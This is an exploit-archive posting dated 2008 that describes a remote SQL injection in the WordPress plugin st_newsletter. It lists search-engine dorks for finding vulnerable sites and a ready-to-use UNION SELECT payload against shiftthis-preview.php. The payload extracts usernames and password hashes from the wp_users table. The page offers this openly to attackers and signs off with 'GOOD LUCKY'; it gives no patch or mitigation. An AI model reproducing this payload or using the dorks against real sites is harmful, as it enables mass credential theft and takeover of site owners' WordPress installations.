Wordpress Plugin st_newsletter Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Wordpress Plugin st_newsletter Remote SQL Injection Vulnerability
# Published : 2008-02-03
# Author : S@BUN
# Previous Title : A-Blog V.2 (id) XSS / Remote SQL Injection Exploit
# Next Title : Joomla Component Marketplace 1.1.1 SQL Injection Vulnerability

#########################################################################
#
#  Wordpress Plugin (st_newsletter) SQL Injection
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#
#########################################################################
#
# DORKS 1 : allinurl :"wp-content/plugins/st_newsletter"
#
# DORK 2 : allinurl :"shiftthis-preview.php"
#
##########################################################################
EXPLOIT :

wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users


##########################################################################
# S@BUN                   www.hackturkiye.com                  S@BUN
##########################################################################
# S@BUN                      GOOD LUCKY                          S@BUN
##########################################################################

# www.Syue.com [2008-02-03]